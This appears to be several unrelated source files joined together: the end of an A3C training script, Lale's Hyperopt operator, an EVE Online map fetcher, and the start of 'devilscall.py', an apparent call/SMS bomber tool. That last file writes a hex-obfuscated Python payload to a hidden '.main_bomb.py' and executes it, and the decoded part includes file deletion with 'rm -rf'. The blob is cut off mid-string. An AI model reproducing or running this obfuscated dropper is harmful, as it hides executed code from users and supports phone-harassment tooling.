job = lambda: worker.work(GLOBAL_AC)
t = threading.Thread(target=job)
t.start()
worker_threads.append(t)
COORD.join(worker_threads)
import matplotlib.pyplot as plt
plt.plot(GLOBAL_RUNNING_R)
plt.xlabel('episode')
plt.ylabel('global running reward')
plt.savefig('a3c.png')
plt.show()
GLOBAL_AC.save_ckpt()
if args.test:
# ============================= EVALUATION =============================
# env = gym.make(GAME)
# GLOBAL_AC = ACNet(GLOBAL_NET_SCOPE)
GLOBAL_AC.load_ckpt()
while True:
s = env.reset()
rall = 0
while True:
env.render()
s = s.astype('float32') # double to float
a = GLOBAL_AC.choose_action(s)
s, r, d, _ = env.step(a)
rall += r
if d:
print("reward", rall)
break
|
hyperopt.py | # Copyright 2019 IBM Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import logging
import multiprocessing
import sys
import time
import traceback
import warnings
from typing import Any, Dict, Optional
import hyperopt
import numpy as np
import pandas as pd
from hyperopt.exceptions import AllTrialsFailed
from sklearn.metrics import check_scoring, log_loss
from sklearn.model_selection import train_test_split
from sklearn.model_selection._split import check_cv
import lale.docstrings
import lale.helpers
import lale.operators
from lale.helpers import (
create_instance_from_hyperopt_search_space,
cross_val_score_track_trials,
)
from lale.lib.sklearn import LogisticRegression
from lale.search.op2hp import hyperopt_search_space
from lale.search.PGO import PGO
SEED = 42
logger = logging.getLogger(__name__)
logger.setLevel(logging.ERROR)
class HyperoptImpl:
def __init__(
self,
estimator=None,
max_evals=50,
frac_evals_with_defaults=0,
algo="tpe",
cv=5,
handle_cv_failure=False,
scoring=None,
best_score=0.0,
max_opt_time=None,
max_eval_time=None,
pgo: Optional[PGO] = None,
show_progressbar=True,
args_to_scorer=None,
verbose=False,
):
self.max_evals = max_evals
if estimator is None:
self.estimator = LogisticRegression()
else:
self.estimator = estimator
if frac_evals_with_defaults > 0:
self.evals_with_defaults = int(frac_evals_with_defaults * max_evals)
else:
self.evals_with_defaults = 0
self.algo = algo
self.scoring = scoring
if self.scoring is None:
is_clf = self.estimator.is_classifier()
if is_clf:
self.scoring = "accuracy"
else:
self.scoring = "r2"
self.best_score = best_score
self.handle_cv_failure = handle_cv_failure
self.cv = cv
self._trials = hyperopt.Trials()
self._default_trials = hyperopt.Trials()
self.max_opt_time = max_opt_time
self.max_eval_time = max_eval_time
self.pgo = pgo
self.show_progressbar = show_progressbar
if args_to_scorer is not None:
self.args_to_scorer = args_to_scorer
else:
self.args_to_scorer = {}
self.verbose = verbose
def _summarize_statuses(self):
status_list = self._trials.statuses()
status_hist = {}
for status in status_list:
status_hist[status] = 1 + status_hist.get(status, 0)
if hyperopt.STATUS_FAIL in status_hist:
print(
f"{status_hist[hyperopt.STATUS_FAIL]} out of {len(status_list)} trials failed, call summary() for details."
)
if not self.verbose:
print("Run with verbose=True to see per-trial exceptions.")
def fit(self, X_train, y_train):
opt_start_time = time.time()
is_clf = self.estimator.is_classifier()
self.cv = check_cv(self.cv, y=y_train, classifier=is_clf)
data_schema = lale.helpers.fold_schema(X_train, y_train, self.cv, is_clf)
self.search_space = hyperopt.hp.choice(
"meta_model",
[
hyperopt_search_space(
self.estimator, pgo=self.pgo, data_schema=data_schema
)
],
)
# Create a search space with default hyperparameters for all trainable parts of the pipeline.
# This search space is used for `frac_evals_with_defaults` fraction of the total trials.
try:
self.search_space_with_defaults = hyperopt.hp.choice(
"meta_model",
[
hyperopt_search_space(
self.estimator.freeze_trainable(),
pgo=self.pgo,
data_schema=data_schema,
)
],
)
except Exception:
logger.warning(
"Exception caught during generation of default search space, setting frac_evals_with_defaults to zero."
)
self.evals_with_defaults = 0
def hyperopt_train_test(params, X_train, y_train):
warnings.filterwarnings("ignore")
trainable = create_instance_from_hyperopt_search_space(
self.estimator, params
)
try:
cv_score, logloss, execution_time = cross_val_score_track_trials(
trainable,
X_train,
y_train,
cv=self.cv,
scoring=self.scoring,
args_to_scorer=self.args_to_scorer,
)
logger.debug(
"Successful trial of hyperopt with hyperparameters:{}".format(
params
)
)
except BaseException as e:
# If there is any error in cross validation, use the score based on a random train-test split as the evaluation criterion
if self.handle_cv_failure:
(
X_train_part,
X_validation,
y_train_part,
y_validation,
) = train_test_split(X_train, y_train, test_size=0.20)
start = time.time()
trained = trainable.fit(X_train_part, y_train_part)
scorer = check_scoring(trainable, scoring=self.scoring)
cv_score = scorer(
trained, X_validation, y_validation, **self.args_to_scorer
)
execution_time = time.time() - start
y_pred_proba = trained.predict_proba(X_validation)
try:
logloss = log_loss(y_true=y_validation, y_pred=y_pred_proba)
except BaseException:
logloss = 0
logger.debug("Warning, log loss cannot be computed")
else:
logger.debug(e)
logger.debug(
"Error {} with pipeline:{}".format(e, trainable.to_json())
)
raise e
return cv_score, logloss, execution_time
def merge_trials(trials1, trials2):
max_tid = max([trial["tid"] for trial in trials1.trials])
for trial in trials2:
tid = trial["tid"] + max_tid + 1
hyperopt_trial = hyperopt.Trials().new_trial_docs(
tids=[None], specs=[None], results=[None], miscs=[None]
)
hyperopt_trial[0] = trial
hyperopt_trial[0]["tid"] = tid
hyperopt_trial[0]["misc"]["tid"] = tid
for key in hyperopt_trial[0]["misc"]["idxs"].keys():
hyperopt_trial[0]["misc"]["idxs"][key] = [tid]
trials1.insert_trial_docs(hyperopt_trial)
trials1.refresh()
return trials1
def proc_train_test(params, X_train, y_train, return_dict):
return_dict["params"] = copy.deepcopy(params)
try:
score, logloss, execution_time = hyperopt_train_test(
params, X_train=X_train, y_train=y_train
)
return_dict["loss"] = self.best_score - score
return_dict["time"] = execution_time
return_dict["log_loss"] = logloss
return_dict["status"] = hyperopt.STATUS_OK
except BaseException as e:
exception_type = f"{type(e).__module__}.{type(e).__name__}"
try:
trainable = create_instance_from_hyperopt_search_space(
self.estimator, params
)
trial_info = (
f'pipeline: """{trainable.pretty_print(show_imports=False)}"""'
)
except BaseException:
trial_info = f"hyperparams: {params}"
error_msg = f"Exception caught in Hyperopt: {exception_type}, {traceback.format_exc()}with {trial_info}"
logger.warning(error_msg + ", setting status to FAIL")
return_dict["status"] = hyperopt.STATUS_FAIL
return_dict["error_msg"] = error_msg
if self.verbose:
print(return_dict["error_msg"])
def get_final_trained_estimator(params, X_train, y_train):
warnings.filterwarnings("ignore")
trainable = create_instance_from_hyperopt_search_space(
self.estimator, params
)
trained = trainable.fit(X_train, y_train)
return trained
def f(params):
current_time = time.time()
if (self.max_opt_time is not None) and (
(current_time - opt_start_time) > self.max_opt_time
):
# if max optimization time set, and we have crossed it, exit optimization completely
sys.exit(0)
if self.max_eval_time:
# Run hyperopt in a subprocess that can be interupted
manager = multiprocessing.Manager()
proc_dict = manager.dict()
p = multiprocessing.Process(
target=proc_train_test, args=(params, X_train, y_train, proc_dict)
)
p.start()
p.join(self.max_eval_time)
if p.is_alive():
p.terminate()
p.join()
logger.warning(
f"Maximum alloted evaluation time exceeded. with hyperparams: {params}, setting status to FAIL"
)
proc_dict["status"] = hyperopt.STATUS_FAIL
if "status" not in proc_dict:
logger.warning("Corrupted results, setting status to FAIL")
proc_dict["status"] = hyperopt.STATUS_FAIL
else:
proc_dict = {}
proc_train_test(params, X_train, y_train, proc_dict)
return proc_dict
algo = getattr(hyperopt, self.algo)
# Search in the search space with defaults
if self.evals_with_defaults > 0:
try:
hyperopt.fmin(
f,
self.search_space_with_defaults,
algo=algo.suggest,
max_evals=self.evals_with_defaults,
trials=self._default_trials,
rstate=np.random.RandomState(SEED),
show_progressbar=self.show_progressbar,
)
except SystemExit:
logger.warning(
"Maximum alloted optimization time exceeded. Optimization exited prematurely"
)
except AllTrialsFailed:
self._best_estimator = None
if hyperopt.STATUS_OK not in self._trials.statuses():
raise ValueError(
"Error from hyperopt, none of the trials succeeded."
)
try:
hyperopt.fmin(
f,
self.search_space,
algo=algo.suggest,
max_evals=self.max_evals - self.evals_with_defaults,
trials=self._trials,
rstate=np.random.RandomState(SEED),
show_progressbar=self.show_progressbar,
)
except SystemExit:
logger.warning(
"Maximum alloted optimization time exceeded. Optimization exited prematurely"
)
except AllTrialsFailed:
self._best_estimator = None
if hyperopt.STATUS_OK not in self._trials.statuses():
self._summarize_statuses()
raise ValueError("Error from hyperopt, none of the trials succeeded.")
self._trials = merge_trials(self._trials, self._default_trials)
if self.show_progressbar:
self._summarize_statuses()
try:
best_trial = self._trials.best_trial
val_loss = self._trials.best_trial["result"]["loss"]
if len(self._default_trials) > 0:
default_val_loss = self._default_trials.best_trial["result"]["loss"]
if default_val_loss < val_loss:
best_trial = self._default_trials.best_trial
best_params = best_trial["result"]["params"]
logger.info(
"best score: {:.1%}\nbest hyperparams found using {} hyperopt trials: {}".format(
self.best_score - self._trials.average_best_error(),
self.max_evals,
best_params,
)
)
trained = get_final_trained_estimator(best_params, X_train, y_train)
self._best_estimator = trained
except BaseException as e:
logger.warning(
"Unable to extract the best parameters from optimization, the error: {}".format(
e
)
)
self._best_estimator = None
return self
def predict(self, X_eval):
import warnings
warnings.filterwarnings("ignore")
if self._best_estimator is None:
raise ValueError(
"Can not predict as the best estimator is None. Either an attempt to call `predict` "
"before calling `fit` or all the trials during `fit` failed."
)
trained = self._best_estimator
try:
predictions = trained.predict(X_eval)
except ValueError as e:
logger.warning(
"ValueError in predicting using Hyperopt:{}, the error is:{}".format(
trained, e
)
)
predictions = None
return predictions
def summary(self):
"""Table summarizing the trial results (ID, loss, time, log_loss, status).
Returns
-------
result : DataFrame"""
def make_record(trial_dict):
return {
"name": f'p{trial_dict["tid"]}',
"tid": trial_dict["tid"],
"loss": trial_dict["result"].get("loss", float("nan")),
"time": trial_dict["result"].get("time", float("nan")),
"log_loss": trial_dict["result"].get("log_loss", float("nan")),
"status": trial_dict["result"]["status"],
}
records = [make_record(td) for td in self._trials.trials]
result = pd.DataFrame.from_records(records, index="name")
return result
def get_pipeline(self, pipeline_name=None, astype="lale"):
"""Retrieve one of the trials.
Parameters
----------
pipeline_name : union type, default None
- string
Key for table returned by summary(), return a trainable pipeline.
- None
When not specified, return the best trained pipeline found.
astype : 'lale' or 'sklearn', default 'lale'
Type of resulting pipeline.
Returns
-------
result : Trained operator if best, trainable operator otherwise.
"""
best_name = None
if self._best_estimator is not None:
best_name = f'p{self._trials.best_trial["tid"]}'
if pipeline_name is None:
pipeline_name = best_name
if pipeline_name == best_name:
result = getattr(self, "_best_estimator", None)
else:
tid = int(pipeline_name[1:])
params = self._trials.trials[tid]["result"]["params"]
result = create_instance_from_hyperopt_search_space(self.estimator, params)
if result is None or astype == "lale":
return result
assert astype == "sklearn", astype
return result.export_to_sklearn_pipeline()
_hyperparams_schema = {
"allOf": [
{
"type": "object",
"required": [
"estimator",
"max_evals",
"cv",
"handle_cv_failure",
"max_opt_time",
"pgo",
"show_progressbar",
],
"relevantToOptimizer": ["estimator", "max_evals", "cv"],
"additionalProperties": False,
"properties": {
"estimator": {
"description": "Planned Lale individual operator or pipeline,\nby default LogisticRegression.",
"anyOf": [
{"laleType": "operator", "not": {"enum": [None]}},
{"enum": [None]},
],
"default": None,
},
"algo": {
"description": """Algorithm for searching the space.
Use 'rand' for random search,
'tpe' for tree of parzen estimators,
'atpe' for adaptive TPE,
'anneal' for variant on random search that takes some advantage of a smooth response surface.""",
"enum": ["rand", "tpe", "atpe", "anneal"],
"default": "tpe",
},
"max_evals": {
"description": "Number of trials of Hyperopt search.",
"type": "integer",
"minimum": 1,
"default": 50,
},
"frac_evals_with_defaults": {
"description": """Sometimes, using default values of hyperparameters works quite well.
This value would allow a fraction of the trials to use default values. Hyperopt searches the entire search space
for (1-frac_evals_with_defaults) fraction of max_evals.""",
"type": "number",
"minimum": 0.0,
"default": 0,
},
"cv": {
"description": """Cross-validation as integer or as object that has a split function.
The fit method performs cross validation on the input dataset for per
trial, and uses the mean cross validation performance for optimization.
This behavior is also impacted by handle_cv_failure flag.
If integer: number of folds in sklearn.model_selection.StratifiedKFold.
If object with split function: generator yielding (train, test) splits
as arrays of indices. Can use any of the iterators from
https://scikit-learn.org/stable/modules/cross_validation.html#cross-validation-iterators.""",
"anyOf": [
{"type": "integer"},
{"laleType": "Any", "forOptimizer": False},
],
"minimum": 1,
"default": 5,
},
"handle_cv_failure": {
"description": """How to deal with cross validation failure for a trial.
If True, continue the trial by doing a 80-20 percent train-validation
split of the dataset input to fit and report the score on the
validation part. If False, terminate the trial with FAIL status.""",
"type": "boolean",
"default": False,
},
"scoring": {
"description": """Scorer object, or known scorer named by string.
Default of None translates to `accuracy` for classification and `r2` for regression.""",
"anyOf": [
{
"description": """Custom scorer object created with `make_scorer`_.
The argument to make_scorer can be one of scikit-learn's metrics_,
or it can be a user-written Python function to create a completely
custom scorer objects, following the `model_evaluation`_ example.
The metric has to return a scalar value. Note that scikit-learns's
scorer object always returns values such that higher score is
better. Since Hyperopt solves a minimization problem, we pass
(best_score - score) to Hyperopt.
.. _`make_scorer`: https://scikit-learn.org/stable/modules/generated/sklearn.metrics.make_scorer.html#sklearn.metrics.make_scorer.
.. _metrics: https://scikit-learn.org/stable/modules/classes.html#module-sklearn.metrics
.. _`model_evaluation`: https://scikit-learn.org/stable/modules/model_evaluation.html
""",
"not": {"type": "string"},
},
{
"description": "Known scorer for classification task.",
"enum": [
"accuracy",
"explained_variance",
"max_error",
"roc_auc",
"roc_auc_ovr",
"roc_auc_ovo",
"roc_auc_ovr_weighted",
"roc_auc_ovo_weighted",
"balanced_accuracy",
"average_precision",
"neg_log_loss",
"neg_brier_score",
],
},
{
"description": "Known scorer for regression task.",
"enum": [
"r2",
"neg_mean_squared_error",
"neg_mean_absolute_error",
"neg_root_mean_squared_error",
"neg_mean_squared_log_error",
"neg_median_absolute_error",
],
},
],
"default": None,
},
"best_score": {
"description": """The best score for the specified scorer.
This allows us to return a loss to hyperopt that is >=0,
where zero is the best loss.""",
"type": "number",
"default": 0.0,
},
"max_opt_time": {
"description": "Maximum amout of time in seconds for the optimization.",
"anyOf": [
{"type": "number", "minimum": 0.0},
{"description": "No runtime bound.", "enum": [None]},
],
"default": None,
},
"max_eval_time": {
"description": "Maximum amout of time in seconds for each evaluation.",
"anyOf": [
{"type": "number", "minimum": 0.0},
{"description": "No runtime bound.", "enum": [None]},
],
"default": None,
},
"pgo": {
"anyOf": [{"description": "lale.search.PGO"}, {"enum": [None]}],
"default": None,
},
"show_progressbar": {
"description": "Display progress bar during optimization.",
"type": "boolean",
"default": True,
},
"args_to_scorer": {
"anyOf": [
{"type": "object"}, # Python dictionary
{"enum": [None]},
],
"description": """A dictionary of additional keyword arguments to pass to the scorer.
Used for cases where the scorer has a signature such as ``scorer(estimator, X, y, **kwargs)``.
""",
"default": None,
},
"verbose": {
"description": """Whether to print errors from each of the trials if any.
This is also logged using logger.warning.""",
"type": "boolean",
"default": False,
},
},
}
]
}
_input_fit_schema = {
"type": "object",
"required": ["X", "y"],
"properties": {"X": {}, "y": {}},
}
_input_predict_schema = {"type": "object", "required": ["X"], "properties": {"X": {}}}
_output_predict_schema: Dict[str, Any] = {}
_combined_schemas = {
"description": """Hyperopt_ is a popular open-source Bayesian optimizer.
.. _Hyperopt: https://github.com/hyperopt/hyperopt
Examples
--------
>>> from lale.lib.sklearn import LogisticRegression as LR
>>> clf = Hyperopt(estimator=LR, cv=3, max_evals=5)
>>> from sklearn import datasets
>>> diabetes = datasets.load_diabetes()
>>> X = diabetes.data[:150]
>>> y = diabetes.target[:150]
>>> trained = clf.fit(X, y)
>>> predictions = trained.predict(X)
Other scoring metrics:
>>> from sklearn.metrics import make_scorer, f1_score
>>> clf = Hyperopt(estimator=LR,
... scoring=make_scorer(f1_score, average='macro'), cv=3, max_evals=5)
""",
"documentation_url": "https://lale.readthedocs.io/en/latest/modules/lale.lib.lale.hyperopt.html",
"import_from": "lale.lib.lale",
"type": "object",
"tags": {"pre": [], "op": ["estimator"], "post": []},
"properties": {
"hyperparams": _hyperparams_schema,
"input_fit": _input_fit_schema,
"input_predict": _input_predict_schema,
"output_predict": _output_predict_schema,
},
}
lale.docstrings.set_docstrings(HyperoptImpl, _combined_schemas)
Hyperopt = lale.operators.make_operator(HyperoptImpl, _combined_schemas)
|
fetch-map.py | # Copyright © 2018 Po Huit
# [This program is licensed under the "MIT License"]
# Please see the file LICENSE in the source
# distribution of this software for license terms.
# Fetch EVE systems and stargates using ESI
from time import sleep
import http.client as client
import json
from sys import stdout, stderr
import threading
# Where to fetch the maps from.
esi_endpoint = "esi.evetech.net"
# What version to fetch.
esi_version = "latest"
# Number of retries before giving up.
max_retries = 5
# How long to wait between retries (secs).
retry_timeout = 5.0
# How long to wait before reopening the connection (secs).
reopen_timeout = 5.0
# Delay inserted to max at given request rate (per sec).
request_rate = 20.0
# Number of simultaneous fetch threads to spawn.
nthreads = 20
# https://stackoverflow.com/a/312464
def chunks(l, n):
"Yield n equal-sized chunks from l."
nl = len(l)
nchunk = nl // n
for i in range(0, nl, nchunk):
yield l[i:i + nchunk]
def log(*args):
"Print to stdout and flush."
print(*args)
stdout.flush()
# Thread-local storage.
tls = threading.local()
def ccp_request(path):
"Make an ESI request."
url = "/" + esi_version + "/" + path + "/"
for retries in range(max_retries):
try:
if retries == 1:
sleep(reopen_timeout)
tls.connection.close()
tls.connection = client.HTTPSConnection(esi_endpoint)
else:
sleep(1.0/request_rate)
tls.connection.request('GET', url)
response = tls.connection.getresponse()
if response.status == 200:
try:
return json.load(response)
except json.decoder.JSONDecodeError as e:
print("json error: ", e, file=stderr)
else:
print("bad response status: ", response.status, file=stderr)
except client.HTTPException as e:
print("http error: ", e.code, file=stderr)
if retries < max_retries - 1:
sleep(retry_timeout)
print("fetch failed for", url, file=stderr)
exit(1)
# Map of retrieved systems and stargates.
by_system_id = dict()
by_stargate_id = dict()
# A thread worker.
def worker(systems):
"Fetch the given systems' information via ESI."
global by_system_id, by_stargate_id
tls.connection = client.HTTPSConnection(esi_endpoint)
tls.by_system_id = dict()
tls.by_stargate_id = dict()
# Grab the systems.
for system_id in systems:
system = ccp_request('universe/systems/' + str(system_id))
log(system['name'])
tls.by_system_id[system_id] = system
# Grab the stargates for each system.
for system_id, system in tls.by_system_id.items():
if 'stargates' not in system:
continue
stargates = system['stargates']
for stargate_id in stargates:
stargate = ccp_request('universe/stargates/' + str(stargate_id))
log(system['name'], "->", stargate_id)
tls.by_stargate_id[stargate_id] = stargate
# Move system and stargate information to the global map.
for system_id, system in tls.by_system_id.items():
by_system_id[system_id] = system
for stargate_id, stargate in tls.by_stargate_id.items():
by_stargate_id[stargate_id] = stargate
# Open the master connection and get a list of systems.
tls.connection = client.HTTPSConnection(esi_endpoint)
systems = ccp_request('universe/systems')
nsystems = len(systems)
log(nsystems, "systems")
# Start and collect the threads.
threads = [threading.Thread(target=worker, args=(chunk,))
for chunk in chunks(systems, nthreads)]
for t in threads:
t.start()
for t in threads:
t.join()
# Write the output JSON.
info = {'systems': by_system_id, 'stargates': by_stargate_id}
with open('eve-map.json', 'w') as dumpfile:
json.dump(info, dumpfile)
|
devilscall.py | #!/usr/bin/python3
# This Python file uses the following encoding: utf-8
import getpass
import base64
import multiprocessing
import gettext
import sys
#import ssl
import re
import json
import subprocess
import ctypes
import random
import datetime
from time import sleep
from os import system, environ, path, getuid
from distutils.dir_util import copy_tree
from multiprocessing import Process
from subprocess import check_output, CalledProcessError
from sys import stdout, argv, exit
#change is done
import getpass
import base64
RED, WHITE, CYAN, GREEN, DEFAULT , YELLOW, YELLOW2, GREEN2 = '\033[1;91m', '\033[46m', '\033[1;36m', '\033[1;32m', '\033[3;0m' , '\033[1;33m' , '\033[1;93m', '\033[1;92m'
def verCheck():
system('clear')
print("\n{0}[{2}#{0}] {2}Checking For Updates{2}...".format(RED, WHITE, CYAN, GREEN, DEFAULT , YELLOW ))
system('wget -q -O test.txt https://raw.githubusercontent.com/404-ghost/Devil-s-Call/master/version.txt')
system('clear')
file = open('version.txt','r')
a = file.read()
x = a.split("\n")
file2 = open('test.txt','r')
b = file2.read()
z = b.split("\n")
file.close()
file2.close()
if x[0] == z[0]:
print("{0}[{2}#{0}] {2}[Up-To-Date]- {0}v {6}{4}".format(RED, WHITE, CYAN, GREEN, DEFAULT , YELLOW, z[0]))
system('git checkout HEAD^ data --quiet && git checkout HEAD^ devilscall.py --quiet && git checkout HEAD^ banner.py --quiet && git checkout HEAD^ LICENSE --quiet && git checkout HEAD^ version.txt --quiet')
system('git stash --quiet')
system('git pull --quiet')
system('rm -rf test.txt')
sleep(2)
else:
print("\n{0}[{2}#{0}] {2}Their Is A Newer Version Available.".format(RED, WHITE, CYAN, GREEN, DEFAULT , YELLOW))
print("{0}[{2}#{0}] {0}[{2}Current{0}]{2}- {0}v {6}\n{0}[{2}#{0}] {0}[{2}Available{0}]{2}- {0}v.{7}".format(RED, WHITE, CYAN, GREEN, DEFAULT, YELLOW, x[0], z[0]))
print("{0}[{2}#{0}] {2}Updating To The Latest Version {0}[{2}v {6}{0}] \n{0}[{2}#{0}] {2}Please Wait....{7}\n".format(RED, WHITE, CYAN, GREEN, DEFAULT , YELLOW, z[0] ,GREEN2))
system('git checkout HEAD^ data --quiet && git checkout HEAD^ devilscall.py --quiet && git checkout HEAD^ banner.py --quiet && git checkout HEAD^ LICENSE --quiet && git checkout HEAD^ version.txt --quiet')
system('git stash --quiet')
system('git pull')
sleep(1)
system('rm -rf test.txt')
file = open('version.txt','r')
a = file.read()
x = a.split("\n")
print("{0}[{2}*{0}] {2}Version Status After Update.{2}.\n".format(RED, WHITE, CYAN, GREEN, DEFAULT , YELLOW))
print("{0}[{2}*{0}] {0}[{2}Current{0}]{2}- {0}v {6}\n{0}[{2}*{0}] {0}[{2}Available{0}]{2}- {0}v.{7}{4}".format(RED, WHITE, CYAN, GREEN, DEFAULT , YELLOW, x[0], z[0]))
sleep(1)
system('clear')
print("\n\n\n\t\t{2}[{0}#{2}] {0}Restart program \n {2}Enter this command to run {0}-> {3}python3 devilscall.py".format(RED, WHITE, CYAN, GREEN, DEFAULT , YELLOW))
exit()
def loadingHack():
system("clear")
print("\n\n{3}".format(RED, WHITE, CYAN, GREEN, DEFAULT ,YELLOW))
chaine ="/////////////////////"+"[*]"+" Starting Devil-s-Call......"+"/////////////////////".format(RED, WHITE, CYAN, GREEN, DEFAULT ,YELLOW)
charspec = "$*X^%\#~?;"
i=0
while i<1:
chainehack = ""
i +=1
for c in chaine:
chainehack += c
r = random.choice(charspec)+random.choice(charspec)+random.choice(charspec)
if len(chainehack+r) <= len(chaine):
pass
else:
r = ""
sys.stdout.write('\r'+chainehack+r)
sleep(0.06)
system("python3 .main_bomb.py")
def magic():
file1 = open(".main_bomb.py", "w")
L = '''
\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x0a\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x79\x74\x68\x6f\x6e\x33\x0a\x23\x20\x54\x68\x69\x73\x20\x50\x79\x74\x68\x6f\x6e\x20\x66\x69\x6c\x65\x20\x75\x73\x65\x73\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x20\x75\x74\x66\x2d\x38\x0a\x23\x20\x74\x68\x69\x73\x20\x63\x6f\x64\x65\x20\x69\x73\x20\x64\x6f\x6e\x65\x20\x62\x79\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x69\x74\x68\x75\x62\x2e\x63\x6f\x6d\x2f\x34\x30\x34\x2d\x67\x68\x6f\x73\x74\x22\x0a\x69\x6d\x70\x6f\x72\x74\x20\x67\x65\x74\x70\x61\x73\x73\x0a\x69\x6d\x70\x6f\x72\x74\x20\x62\x61\x73\x65\x36\x34\x0a\x69\x6d\x70\x6f\x72\x74\x20\x6d\x75\x6c\x74\x69\x70\x72\x6f\x63\x65\x73\x73\x69\x6e\x67\x0a\x69\x6d\x70\x6f\x72\x74\x20\x67\x65\x74\x74\x65\x78\x74\x0a\x69\x6d\x70\x6f\x72\x74\x20\x73\x79\x73\x0a\x23\x69\x6d\x70\x6f\x72\x74\x20\x73\x73\x6c\x0a\x69\x6d\x70\x6f\x72\x74\x20\x72\x65\x0a\x69\x6d\x70\x6f\x72\x74\x20\x6a\x73\x6f\x6e\x0a\x69\x6d\x70\x6f\x72\x74\x20\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x0a\x69\x6d\x70\x6f\x72\x74\x20\x63\x74\x79\x70\x65\x73\x0a\x69\x6d\x70\x6f\x72\x74\x20\x72\x61\x6e\x64\x6f\x6d\x0a\x69\x6d\x70\x6f\x72\x74\x20\x64\x61\x74\x65\x74\x69\x6d\x65\x0a\x66\x72\x6f\x6d\x20\x74\x69\x6d\x65\x20\x69\x6d\x70\x6f\x72\x74\x20\x73\x6c\x65\x65\x70\x0a\x66\x72\x6f\x6d\x20\x6f\x73\x20\x69\x6d\x70\x6f\x72\x74\x20\x73\x79\x73\x74\x65\x6d\x2c\x20\x65\x6e\x76\x69\x72\x6f\x6e\x2c\x20\x70\x61\x74\x68\x2c\x20\x67\x65\x74\x75\x69\x64\x2c\x20\x72\x65\x6d\x6f\x76\x65\x0a\x66\x72\x6f\x6d\x20\x64\x69\x73\x74\x75\x74\x69\x6c\x73\x2e\x64\x69\x72\x5f\x75\x74\x69\x6c\x20\x69\x6d\x70\x6f\x72\x74\x20\x63\x6f\x70\x79\x5f\x74\x72\x65\x65\x0a\x66\x72\x6f\x6d\x20\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x20\x69\x6d\x70\x6f\x72\x74\x20\x63\x68\x65\x63\x6b\x5f\x6f\x75\x74\x70\x75\x74\x2c\x20\x43\x61\x6c\x6c\x65\x64\x50\x72\x6f\x63\x65\x73\x73\x45\x72\x72\x6f\x72\x0a\x66\x72\x6f\x6d\x20\x6d\x75\x6c\x74\x69\x70\x72\x6f\x63\x65\x73\x73\x69\x6e\x67\x20\x69\x6d\x70\x6f\x72\x74\x20\x50\x72\x6f\x63\x65\x73\x73\x0a\x66\x72\x6f\x6d\x20\x73\x79\x73\x20\x69\x6d\x70\x6f\x72\x74\x20\x73\x74\x64\x6f\x75\x74\x2c\x20\x61\x72\x67\x76\x2c\x20\x65\x78\x69\x74\x0a\x66\x72\x6f\x6d\x20\x64\x61\x74\x61\x20\x69\x6d\x70\x6f\x72\x74\x20\x2a\x0a\x66\x72\x6f\x6d\x20\x61\x70\x69\x20\x69\x6d\x70\x6f\x72\x74\x20\x2a\x0a\x66\x72\x6f\x6d\x20\x62\x61\x6e\x6e\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x20\x2a\x0a\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x20\x59\x45\x4c\x4c\x4f\x57\x2c\x20\x59\x45\x4c\x4c\x4f\x57\x32\x2c\x20\x47\x52\x45\x45\x4e\x32\x20\x3d\x20\x27\x5c\x30\x33\x33\x5b\x31\x3b\x39\x31\x6d\x27\x2c\x20\x27\x5c\x30\x33\x33\x5b\x34\x36\x6d\x27\x2c\x20\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x36\x6d\x27\x2c\x20\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x32\x6d\x27\x2c\x20\x27\x5c\x30\x33\x33\x5b\x33\x3b\x30\x6d\x27\x20\x2c\x20\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x33\x6d\x27\x20\x2c\x20\x27\x5c\x30\x33\x33\x5b\x31\x3b\x39\x33\x6d\x27\x2c\x20\x27\x5c\x30\x33\x33\x5b\x31\x3b\x39\x32\x6d\x27\x0a\x62\x6c\x69\x6e\x6b\x20\x3d\x20\x22\x5c\x30\x33\x33\x5b\x35\x6d\x22\x0a\x63\x6f\x6c\x6f\x72\x73\x3d\x5b\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x31\x6d\x27\x2c\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x32\x6d\x27\x2c\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x33\x6d\x27\x2c\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x34\x6d\x27\x2c\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x35\x6d\x27\x2c\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x36\x6d\x27\x5d\x0a\x57\x3d\x27\x5c\x30\x33\x33\x5b\x30\x6d\x27\x0a\x64\x65\x66\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x3a\x0a\x20\x20\x20\x20\x72\x65\x6d\x6f\x76\x65\x28\x22\x2e\x6d\x61\x69\x6e\x5f\x62\x6f\x6d\x62\x2e\x70\x79\x22\x29\x0a\x20\x20\x20\x20\x72\x65\x6d\x6f\x76\x65\x28\x22\x61\x70\x69\x2e\x70\x79\x22\x29\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x72\x6d\x20\x2d\x72\x66\x20\x64\x61\x74\x61\x2f\x44\x65\x76\x69\x6c\x2d\x73\x2d\x43\x61\x6c\x6c\x22\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x